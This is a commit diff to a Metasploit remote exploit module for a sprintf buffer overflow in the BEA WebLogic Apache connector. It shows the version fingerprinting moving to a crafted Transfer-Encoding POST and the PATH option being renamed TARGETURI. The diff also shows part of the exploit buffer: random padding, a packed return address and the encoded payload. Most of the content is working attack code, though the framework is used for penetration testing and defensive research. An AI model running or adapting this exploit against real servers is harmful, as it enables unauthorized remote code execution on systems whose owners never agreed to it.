fingerprinting bea connector with Transfer-Encoding
jvazquez-r7
parent
9a5e4d6500
commit
a21e832336
|
|
@ -25,6 +25,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
requests resulting in a buffer overflow due to the insecure usage
|
||||
of sprintf.
|
||||
|
||||
The Weblogic Apache plugin version is fingerprinted with a POST
|
||||
request containing a specially crafted Transfer-Encoding header.
|
||||
|
||||
At this moment this module works over Windows systems without DEP
|
||||
and has been tested with Windows 2000 / XP.
|
||||
},
|
||||
|
|
@ -78,24 +81,26 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('PATH', [ true, "The URI path to a jsp or object provided by Weblogic", '/index.jsp'])
|
||||
OptString.new('TARGETURI', [true, 'The URI path to a jsp or object provided by Weblogic', '/index.jsp']),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def check
|
||||
|
||||
my_data = rand_text_alpha(rand(5) + 8)
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'method' => 'POST',
|
||||
'uri' => datastore['PATH'],
|
||||
'headers' =>
|
||||
{
|
||||
'Content-Length' => -1
|
||||
}
|
||||
})
|
||||
{
|
||||
'method' => 'POST',
|
||||
'uri' => target_uri.path,
|
||||
'headers' =>
|
||||
{
|
||||
'Transfer-Encoding' => my_data
|
||||
},
|
||||
'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
|
||||
})
|
||||
|
||||
if res and res.code == 500
|
||||
if res and res.code == 200
|
||||
|
||||
# BEA WebLogic 8.1 SP6 - mod_wl_20.so
|
||||
if res.body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and
|
||||
|
|
@ -139,7 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return
|
||||
end
|
||||
|
||||
uri = datastore['PATH']
|
||||
uri = target_uri.path
|
||||
sploit = rand_text_alphanumeric(my_target['Offset']-uri.length)
|
||||
sploit << [my_target.ret].pack("V")
|
||||
sploit << payload.encoded
|
||||
|
|
@ -158,17 +163,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
return target if target.name != 'Automatic'
|
||||
|
||||
my_data = rand_text_alpha(rand(5) + 8)
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'method' => 'POST',
|
||||
'uri' => datastore['PATH'],
|
||||
'uri' => target_uri.path,
|
||||
'headers' =>
|
||||
{
|
||||
'Content-Length' => -1
|
||||
}
|
||||
'Transfer-Encoding' => my_data
|
||||
},
|
||||
'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
|
||||
})
|
||||
|
||||
if res and res.code == 500
|
||||
if res and res.code == 200
|
||||
# BEA WebLogic 8.1 SP6 - mod_wl_20.so
|
||||
if res.body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and
|
||||
res.body =~ /Change Number:<\/B> <I>779586/
|
||||
|
|
|
|||
Loading…
Reference in New Issue